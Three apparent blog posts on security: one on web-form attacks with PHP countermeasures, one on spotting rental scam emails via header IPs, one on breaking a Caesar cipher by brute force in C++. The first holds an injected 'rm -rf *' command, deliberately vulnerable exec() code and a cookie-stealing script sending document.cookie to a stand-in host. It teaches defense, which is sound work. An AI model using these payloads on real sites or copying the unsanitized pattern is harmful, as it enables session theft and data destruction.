Wednesday, June 29, 2011

Attacking, Authentication, and Access Control

Introduction
It's a growing trend that as more and more services are placed on-line, we rely more and more on entering our data into what we trust to be secure web-forms. Has it ever crossed our minds, though, that we enter our information into web forms almost daily -- assuming that no one else will have access to it? In what can be likened to the Wild West, there can't be any room for complacency on the internet. It's this complacency that plays a major role in why authentication and access control measures have become so important. In this article we will look at three potential attacks that can be mounted against web forms -- executing shell commands, cross-site scripting, and phishing -- and discuss the counter measures, using the PHP programming language, that can be used to avoid being hit by such attacks.

"Forming" the Attack
The first attack we are going to discuss is the passing of shell commands through web-forms. For the most part, this is only possible when the form's input reaches the exec() or system() functions in PHP. These functions -- simply put -- allow developers to execute shell commands on the server through PHP. What's more, these functions don't check what is being passed to them; they simply execute the commands they are given. For example, if we were to use an exec() function to pass a value to a command line program, it would be possible to append an extra command at the end -- assuming the site wasn't validating user input, of course. Doing so would turn a seemingly innocent application, most likely written out of convenience, into an attacker's tool capable of doing untold damage to the files on your server. Figure 1 shows the input that could be used to accomplish such an attack.

                         [Figure 1: Passing rm shell command to exec() function]
As we can see, the corresponding value for the form is entered "as usual" -- however -- the "rm -rf *" shell command was also appended to the end. In doing so, the attacker deletes every file the web server has permission to remove within the directory that houses the PHP script containing the exec() function. Having viewed an image of how the attack might take place, let's look at the code in order to understand its "under the hood" aspects.

[Listing 1: HTML form code]
<html>
        <head>
                <title>A Simple HTML Form</title>
        </head>
        <body>
                <form action="" method="post">
                        <table border="0">
                                <tr><td>Enter value:<input type="text" name="value" /></td></tr>
                                <tr><td><input type="submit" value="Enter" /></td></tr>
                        </table>
                </form>
        </body>
</html>

[Listing 2: PHP process code]
<?php
// Intentionally vulnerable: the user's input reaches the shell unchecked
$getValue = $_POST["value"];
exec("/usr/bin/some_command_line_app " . $getValue);
?>

Looking at the previously listed code, nothing seems out of place at first glance. We are writing a simple web-form and its processing code in PHP, and using an exec() function to pass a value to the command line. The problem begins when we don't "sanitize" the user's input. Such a simple omission can lead to pretty hefty consequences, as was just demonstrated. That said, there are some steps that can be taken to keep such malicious shell commands from being executed through your web-forms.

Moving from malicious shell commands to malicious code, cross-site scripting is the next attack we will be looking at. In this case, the attacker enters malicious code into a web-form within a website so that it later runs in the browsers of the site's other visitors. One reason why cross-site scripting is such a growing attack vector is its ability to steal cookies. In doing so, the attacker is then capable of stealing whatever login information those cookies hold, such as session identifiers or, on poorly designed sites, usernames and passwords. Considering this possibility, let's assume that the attacker was able to find a website that was vulnerable to cross-site scripting attacks. The attacker would then pass malicious code similar to what we see in listing 3.

[Listing 3: Malicious Cross Site Scripting Code]
<script>
document.location =
"http://www.fakesite.com/cookiestealer.php?cookie=" + document.cookie;
</script>

The code in listing 3 would essentially pass cookie data to a fake website and a PHP script capable of logging all of the cookies' contents -- most likely to a database or text file of sorts. Remembering that we are talking about a website that is not validating user input into its web-form, this is a major problem. Having such information means that the attacker is now capable of masquerading as any of the victims who had their information stolen. This also gives the attacker added access to the website: because he or she is now able to log in, defacing the website becomes easier.

Finally, we have the phishing attack. Phishing attacks are different from the previously mentioned attacks in that they imitate a website by maintaining similar HTML and CSS formatting but use a completely different PHP script, for example, behind the form. Basically, this allows the attacker to use the PHP language against itself in that he or she is able to get the same values from the form, but uses the script for the purpose of storing the now stolen information, usually in a database or text file, or simply emailing it all back to the attacker. The danger of such an attack increases because the front end of the imitation is pretty much exactly the same as the legitimate version, meaning that users have a harder time telling the difference.

Countering The Attacker
We've looked at the attacks and we've gone through the code; now the time has come to discuss the counter measures that can be used to avoid these kinds of attacks. Let's first consider an attack using malicious shell commands. In order to stop this kind of attack we can use a couple of PHP functions -- escapeshellarg() and escapeshellcmd(). Looking at the escapeshellarg() function first, this function essentially wraps the argument passed to it in single quotes and also escapes any single quotes that might be present within the string argument itself.

This function ensures that whatever is passed to it reaches the shell as a single argument. In doing so, we are better able to prevent malicious shell commands from being appended to the end of any arguments being passed to exec() or system(). A similar function -- escapeshellcmd() -- is applied to the command string as a whole rather than to a single argument and escapes shell meta-characters that might be found in it. So to reconsider our malicious input from figure 1, the escapeshellcmd() function would escape the ; and * characters, which would in turn keep the shell from treating the appended text as a second command.
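
The quoting rule itself is not specific to PHP. The following C++ sketch is not PHP's implementation; it is a minimal illustration, assuming a POSIX shell, of wrapping a value in single quotes and escaping any single quotes inside it. The function name shellQuote is hypothetical.

```cpp
#include <string>

// Hypothetical helper: wrap a value in single quotes for a POSIX shell,
// replacing each embedded ' with '\'' (close quote, escaped quote, reopen).
std::string shellQuote(const std::string& value)
{
    std::string quoted = "'";
    for (char c : value)
    {
        if (c == '\'')
            quoted += "'\\''";
        else
            quoted += c;
    }
    quoted += "'";
    return quoted;
}
```

With this rule, input such as value; rm -rf * reaches the shell as the single quoted argument 'value; rm -rf *', so the ; and * characters lose their special meaning. In a PHP script, the built-in escapeshellarg() remains the function to use.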

Let's now shift our focus to cross-site scripting. Seeing as the malicious code entered into web-forms contains tags of some sort, there are two functions that can be used to keep HTML tags from being executed by the browser -- htmlentities() and strip_tags(). The htmlentities() function converts characters that have meaning in HTML -- < and > for example -- into their HTML entity equivalents. If we return to our cross-site scripting example and pass the attacker's input through the htmlentities() function, the <script> tag would be converted to "&lt;script&gt;" instead. Thus the attacker's code would no longer function as he or she would expect it to. But because we can't assume that simply rendering HTML tags useless is enough to stop a more enterprising attacker, the strip_tags() function takes it a step further. Instead of converting characters, the strip_tags() function does what its name suggests: it removes HTML tags completely from the attacker's input.
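
To make the conversion concrete, here is a minimal C++ sketch of the idea behind entity encoding. It is an illustration only and covers just four characters, whereas PHP's htmlentities() converts every character that has an entity equivalent. The function name escapeHtml is hypothetical.

```cpp
#include <string>

// Hypothetical helper: replace the characters that have meaning in HTML
// with their entity equivalents so the browser displays them as text.
std::string escapeHtml(const std::string& input)
{
    std::string escaped;
    for (char c : input)
    {
        switch (c)
        {
            case '&': escaped += "&amp;";  break;
            case '<': escaped += "&lt;";   break;
            case '>': escaped += "&gt;";   break;
            case '"': escaped += "&quot;"; break;
            default:  escaped += c;        break;
        }
    }
    return escaped;
}
```

Passing the opening tag from listing 3 through this function yields &lt;script&gt;, which the browser shows as text instead of running as code.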

And as we finally turn our attention to phishing attacks, it should be pointed out that there is no single function that grants protection. The problem with phishing attacks is that similar, if not the same, HTML code is used to trick users into thinking that they are on the legitimate website while an entirely different PHP script is used to steal their personal information. On that note though, it's possible for the attacker to use cross-site scripting in order to re-direct the user to the imitation of the victimized website, where the attacker can then steal their information. This means that guarding against one attack can help stop another, as is the case with guarding against cross-site scripting in order to protect against phishing.

Yet, considering the fact that attackers are growing in technical sophistication, it has become the job of the developer to secure his or her website in a way that doesn't allow their users' information to be compromised. Using the techniques we discussed above is a start in the right direction, but it comes down to strong development practices in the use of supplied PHP functions, encryption, and especially education of the website's users. Development practices won't mean a thing the second the user clicks on a bogus link. While developing more secure PHP scripts is one half of the process, ensuring the user understands the dangers of phishing attacks and the policies of the company is the other. What this means is that it needs to be made clear that the company will never send out emails requesting personal information from its users.

Conclusions
All of the above mentioned attacks are just the tip of the iceberg. We face an internet where attacks and their attackers grow in sophistication almost daily. With the threat of malicious code not disappearing any time soon, we have to use the tools and best practices afforded to us in order to avoid becoming the next statistic. After all, if we are going to continue "converting" our lives to digital, internet-integrated ones, then securing the internet -- especially the web-forms we use -- is a necessity.

Wednesday, May 4, 2011

Analysis of A Scam

Introduction

It's all too often that we hear about being scammed on the internet, especially when using Craigslist – the popular website for selling and buying almost anything on the internet.  It seems as though much of the website has become devoted to messages warning us of the potential for getting scammed.  Recently, I received multiple scam emails and one of them was quite believable.  Because there is such a high possibility that we will end up dealing with email scams in the course of our internet use, this article is devoted to the analysis and steps necessary to determine whether or not you should even waste your time replying.  We will start by analyzing the content of such emails and will end by pointing out just where to look in the email's header in order to determine the originating IP address and the physical location of that IP address.

Off to the Sp3ll!ng B33

For the most part, the easiest way to tell whether or not an email is worth actually reading is by looking for some obvious details.  These details include the email's formatting, spelling, grammatical usage, and punctuation.  Figure 1 shows a portion of one of the emails I received. 

                 Figure 1: The story

The text in figure 1 is peppered with errors of all kinds.  Notice that some sentences start with a capital letter while others do not.  Also notice that some of the words are not even the right word or tense.  If you attempt to read it all the way through, the text really doesn't make much sense and you have to ask yourself the question: why would someone attempt to rent out an apartment from another country without going through a broker or real estate agent?

Figure 2 lists the actual information that the “landlord” needs in order to determine our ability to rent the apartment.  Yet while the information seems standard, most real estate agents don't ask the question “Are you Married?” 

                 Figure 2: The information
Furthermore, looking at the information we are being asked to supply, it's obvious that the scammer is attempting to indirectly gather identity information.  Worse yet, questions six and seven could be used as recovery questions for passwords.  This is where it becomes dangerous to reply to these emails, especially if you are new to scams.  For example, if you happened to reply to the email with all your personal information without asking the question “why?,” you have potentially put the security of your identity, usernames, and passwords at risk.

Having looked at an email that resembles an obvious scam, let's now turn our attention to an email that is a little more believable. 

                            Figure 3: A more believable approach

In figure 3 the first indicator is that it's written with better English in that there are not as many glaring errors.  The scammer is also attempting to let the reader know why they didn't respond right away.  Moving on, figure 4 shows what could be considered the core of the email. 

                 Figure 4: A more believable story   

Taking Steps To Protect Yourself  

Looking at just the email is not always a clear indication as to whether or not you're dealing with a scam, simply because a well designed website is all you need to disguise a phishing attack.  That being the case, there is one piece of information that can help determine what you're dealing with: the originating IP address of the email.  To figure this out, we have to dig deeper into the email and track it down through the email's header information.
 
                     Figure 5: Email header information
Received: from zap-server (***********@173.224.219.130 with login)

Figure 5 shows the originating IP address of the email.  In order to find it, we need to view the full header and look for the very last IP address, which tends to be closest to the bottom of the header information.  To do so, simply click on “Actions” and then “View Full Header” if you are using Yahoo! Mail, or click the down arrow in the upper right hand corner of the email and then “Show original” if using Gmail.  Now that we have obtained the originating IP address, we can use a website to trace it back to its physical location.  There are many websites that can be used to do this, but for demonstration purposes we have used ip-adress.com.
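
For readers who would rather not scan the header by eye, the search can be sketched in a few lines of C++. This is a rough illustration under stated assumptions: the function name lastReceivedIp is hypothetical, the header is assumed to be pasted in as plain text, and each “Received:” entry is assumed to sit on a single line (real headers are often folded across several lines).

```cpp
#include <regex>
#include <sstream>
#include <string>

// Hypothetical helper: return the IPv4 address found on the last
// "Received:" line of a raw header block, or "" if none is found.
std::string lastReceivedIp(const std::string& headers)
{
    static const std::regex ipPattern(R"((\d{1,3}(?:\.\d{1,3}){3}))");
    std::istringstream lines(headers);
    std::string line;
    std::string lastIp;

    while (std::getline(lines, line))
    {
        // Skip every line that does not start with "Received:".
        if (line.rfind("Received:", 0) != 0)
            continue;

        std::smatch match;
        if (std::regex_search(line, match, ipPattern))
            lastIp = match[1].str();   // later lines overwrite earlier ones
    }
    return lastIp;
}
```

Given the line shown in figure 5, the function returns 173.224.219.130, which can then be entered into a tracing website.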

Figure 6 shows the end result of our trace as well as the origin of the IP address.

                           Figure 6:  Tracing results 



Looking at the output in figure 6 we see that the email originated from Western Africa, most likely Nigeria.  Knowing this information, we can now make better decisions as to whether or not we should supply our personal information or even bother replying to the email.

Conclusions
 
As is usually the case, the best way to prevent such attacks is to avoid giving out your personal details in the first place.  It should also be noted that legitimate parties almost never ask for personal data through email.  If you should be asked for personal information, make sure to verify with the person who is asking for it before filling out any web forms or submitting attached “rental applications.”  And if it happens that the email looks plausible, take the time to track down its originating IP address and check where the email actually came from.  Following the analysis we went through, as well as the steps for tracing the email's original location, will help you avoid having your identity stolen and will add a layer of protection to your personal information.

Sunday, May 1, 2011

Breaking The Code: Brute Forcing The Encryption Key

Introduction

There's no way around it: cryptography is an aspect of our digital lives that's becoming more and more prevalent. Because we interact in the vast social network that is the internet, where we enter our personal information into countless profile pages and make the majority of our purchases online, we have an increasing need to focus on cyber security and cryptography. But while cryptography has great potential in securing our information, it's just as vulnerable to attack.

In order to illustrate these points, we will be focusing on a single encryption cipher – the simple-substitution cipher. We will demonstrate software implemented for the purposes of encrypting and decrypting, but also breaking such encryption. As a result, the knowledge imparted through this article can and should be used as a stepping stone towards re-thinking cryptography and how we use it to secure information.

Cipher Basics

The simple substitution cipher – generally considered weak encryption – was known for offering a relatively secure means of hiding information back when it was first introduced. The form we use here, often called a shift or Caesar cipher, works by substituting each character of the clear text with the character a certain number of positions to the right or left of it. We refer to this shift value as the encryption key. For example, the letter A shifted four spaces to the right gives us the letter E. Using this method, we could shift all the letters of the English alphabet four spaces to create what's called a cipher alphabet. This cipher alphabet could then be used to encrypt longer pieces of information.

We will be using a variant of the simple-substitution cipher in that we don't limit the encryption key to the range 0 to 25 (because we start counting from 0 in C++) but rather allow the shift to carry a character past the end of the alphabet. This will become clearer as the encryption and decryption algorithms are explained in the following section. Within a computer, each character is referenced by a number; this number is referred to as the character's ASCII value. To encrypt each character we need to use its ASCII value so we know from where in the alphabet the shift needs to occur. So to look at our previous example, the ASCII value of A is 65 and when shifted 4 spaces becomes 69 or E; figures 1 and 2 demonstrate this more mathematically.

Figure 1: Calculating Cipher Text
X = (O + K)
where:
X is the encrypted letter
O is the original letter
K is the encryption key

Figure 2: Calculating Cipher Text in Practice
69 or E = (A + 4) or (65 + 4)
where:
E is the encrypted letter
A is the original letter
4 is the encryption key
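
The arithmetic in figures 1 and 2 can be sketched in C++ as follows. The function name shiftChar is our own, chosen for illustration, and is not taken from the demonstration software.

```cpp
// Shift one character by the key, as in X = (O + K).
// No wrap-around is applied, matching the variant described above.
char shiftChar(char original, int key)
{
    return static_cast<char>(static_cast<int>(original) + key);
}
```

Here shiftChar('A', 4) gives 'E' (65 + 4 = 69). Because this variant doesn't wrap around the alphabet, shiftChar('Z', 4) gives '^' (90 + 4 = 94) rather than another letter.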

Understanding the Algorithms

It's time to put our theory into practice. Listing 1 shows the encryption algorithm we wrote for the demonstration software. In order to encrypt the clear text we need to loop through the entire string and process each character one by one. The for loop starts by grabbing the first character of the clear text, converting it to its ASCII value and shifting it by the value of the encryption key. Once the character has been shifted, the encrypted value is then converted back to a character and concatenated to a string variable that will store the encrypted text.

The algorithm continues to execute until the end of the clear text, at which point the loop exits and we are left with the encrypted text, which is printed to the screen. The decryption algorithm works just like its encryption counterpart except everything is reversed: we loop over the encrypted text and subtract the encryption key from each encrypted character's ASCII value to recover the clear text. The decryption algorithm is documented in listing 2.

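Listing 1: Encryption Algorithm
// clearText and encryptedText are std::string; encryptionKey is an int
for (std::size_t i = 0; i < clearText.length(); i++)
{
    char currentChar = clearText[i];                 // grab the next character
    int currentInt = int(currentChar);               // convert it to its ASCII value
    int encryptedInt = currentInt + encryptionKey;   // shift by the encryption key
    char encryptedChar = char(encryptedInt);         // convert back to a character
    encryptedText += encryptedChar;                  // append to the encrypted text
}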

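Listing 2: Decryption Algorithm
// encryptedText and clearText are std::string; encryptionKey is an int
for (std::size_t i = 0; i < encryptedText.length(); i++)
{
    char currentChar = encryptedText[i];             // grab the next encrypted character
    int currentInt = int(currentChar);               // convert it to its ASCII value
    int clearInt = currentInt - encryptionKey;       // reverse the shift
    char clearChar = char(clearInt);                 // convert back to a character
    clearText += clearChar;                          // append to the clear text
}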

Following is a sample run of the encryption and decryption algorithms. Listing 3 shows how the message “the quick brown dog” gets encrypted and listing 4, the decryption. Taking a closer look at the encrypted text we see that the word lengths are harder to make out than they are in normal English. Consider this example from a more cryptanalytic perspective for a moment. If this were the only text we had to work with, a red flag already has to be raised. Because there are multiple instances of the dollar sign in the encrypted text, we can assume that this character represents a letter in the original text or another widely used character. But just by comparing the dollar sign to the other encrypted characters, we know that it doesn't represent a letter, mainly because the dollar sign's ASCII value is lower than any of the “A” to “Z” or “a” to “z” characters and so sits well below the rest of the encrypted text. Knowing this, it's a safe bet to assume that the dollar sign represents a space. Subsequently, we can now gain a better idea of where the word boundaries occur in the example. While we have now entered the realm of frequency analysis, it's good to point these things out, as the simple-substitution cipher wears its flaws on public display.

                 Listing 3: Encrypting A Message


                 Listing 4: Decrypting A Message
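
Since the sample output is not reproduced here, the following sketch wraps the loops from listings 1 and 2 into two functions so the run can be repeated. The function names and the key of 4 are assumptions: 4 is simply the key that maps a space (ASCII 32) to the dollar sign (ASCII 36) discussed above.

```cpp
#include <string>

// Shift every character of the clear text up by the key.
std::string encrypt(const std::string& clearText, int encryptionKey)
{
    std::string encryptedText;
    for (char currentChar : clearText)
        encryptedText += static_cast<char>(currentChar + encryptionKey);
    return encryptedText;
}

// Reverse the shift to recover the clear text.
std::string decrypt(const std::string& encryptedText, int encryptionKey)
{
    std::string clearText;
    for (char currentChar : encryptedText)
        clearText += static_cast<char>(currentChar - encryptionKey);
    return clearText;
}
```

Under that assumption, encrypt("the quick brown dog", 4) produces xli$uymgo$fvs{r$hsk, and decrypting that text with the same key recovers the original message.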


Algorithmic Attacks
Our previous discussions have centered around the fact that we knew the encryption key. Most likely, that will not be the case and we will only have the encrypted message to work with.
When this is the case, there are a couple of attacks we can use. One – and the most widely used – is frequency analysis, as we previously alluded to; the other is brute force. While it's not our goal to discuss how to use frequency analysis to break encryption, the process basically requires that we compare the frequency of the characters used in the encrypted text with the frequency of the characters used in the clear text's language – this is usually English.
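
As a rough illustration of the idea, and not a full frequency analysis, the sketch below counts how often each encrypted character occurs and assumes the most frequent one stands for a space. That assumption and the function name guessKeyFromSpaces are ours; it holds for typical English sentences but not for every message.

```cpp
#include <map>
#include <string>

// Hypothetical helper: guess the key by assuming the most frequent
// encrypted character stands for a space in the clear text.
int guessKeyFromSpaces(const std::string& encryptedText)
{
    std::map<char, int> counts;
    for (char c : encryptedText)
        ++counts[c];

    char mostFrequent = ' ';
    int highest = 0;
    for (const auto& entry : counts)
    {
        if (entry.second > highest)
        {
            highest = entry.second;
            mostFrequent = entry.first;
        }
    }
    // The distance between that character and a space is the guessed key.
    return mostFrequent - ' ';
}
```

For an encrypted text in which the dollar sign is the most common character, the function returns 4, since '$' lies four positions above the space in the ASCII table.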

The second attack, and the one we are going to learn how to use, is brute force. In regard to the simple-substitution cipher, brute forcing simply involves trying every number in a range to test which one, if any, is the encryption key. We repeat this process until the encryption key is found and we are able to decipher the encrypted message. The brute forcing algorithm is described in listing 5.
Much like the algorithms we previously looked at, this algorithm also loops over the encrypted text, only instead of using a known encryption key, the algorithm takes a number from the user to use as the upper end of a range starting from 0.

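Listing 5: Brute forcing algorithm
// minRange is 0; maxRange is the upper bound entered by the user
for (int i = minRange; i <= maxRange; i++)
{
    std::string clearText;    // start each candidate from an empty string
    for (char currentChar : encryptedText)
    {
        int currentASCII = int(currentChar);
        int clearASCII = currentASCII - i;    // try i as the encryption key
        char clearChar = char(clearASCII);
        clearText += clearChar;
    }

    cout << clearText << endl;    // print the candidate for key i
}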

You'll also notice that we are using a pair of nested loops in this algorithm as opposed to before where we only needed one. The reason is that the outer loop gives us the potential encryption key while the inner loop applies that potential key to the encrypted text. Once execution reaches the inner loop, it works much like our decryption algorithm in that we are still processing character by character. The difference is that the demonstration software stores each potentially decrypted message in a string array and then prints out each index of the array to the console window for viewing; listing 5 condenses this by printing each candidate as soon as it is built.
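
The string array variant mentioned above might look like the following sketch. It is our own reconstruction under stated assumptions, not the demonstration software itself: the function name bruteForce and the parameter maxRange (the upper bound entered by the user) are hypothetical, and std::vector stands in for the string array.

```cpp
#include <string>
#include <vector>

// Try every key from minRange to maxRange and collect the candidates.
// candidates[i] holds the text decrypted with key (minRange + i).
std::vector<std::string> bruteForce(const std::string& encryptedText,
                                    int minRange, int maxRange)
{
    std::vector<std::string> candidates;
    for (int key = minRange; key <= maxRange; ++key)
    {
        std::string clearText;
        for (char currentChar : encryptedText)
            clearText += static_cast<char>(currentChar - key);
        candidates.push_back(clearText);
    }
    return candidates;
}
```

Keeping the candidates in a container means the index of a readable entry, added to minRange, is the encryption key.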

Listing 6 shows a sample run using the same example as before. The list format makes it easier to determine which index contains the decrypted message.

                 Listing 6: Brute forcing in action


If, on running the program, the range of numbers does not turn up the decrypted text, simply increase the number previously entered and re-run the program. This process can be repeated as often as needed until the deciphered message is displayed in the list. By writing such software, we don't have to concern ourselves with trying each number on its own and can more easily break the encryption.

So What?

Why care about anything we just talked about? After all, in order to demonstrate the process of breaking encryption, we used an obviously outdated algorithm. The point to all this, though, is that software can be written as a tool for cryptanalysis and ultimately the breaking of encryption. Once a software tool is written that is capable of breaking encryption, the amount of time required to break the cipher may no longer be an acceptable deterrent. This is the case because the rise of bot nets and super-computers substantially raises the potential processing power one has to work with: the greater the processing power, the smaller the amount of time needed to break the encryption.

So where are we to look to find a solution to the problem? Because we face a cycle of constantly developing newer technologies to secure information, there is no clear cut solution. As we push forward into the future of information security, it's best that we do away with the oldest of encryption algorithms – keeping them around merely for theoretical purposes – and focus on those that yield the best possible strength for the current security conditions. Finally, we must not forget that the truest sense of security comes down to our treatment of the encryption key. For the advancement of cryptography is inevitable but the person in control of the keys to such systems is not.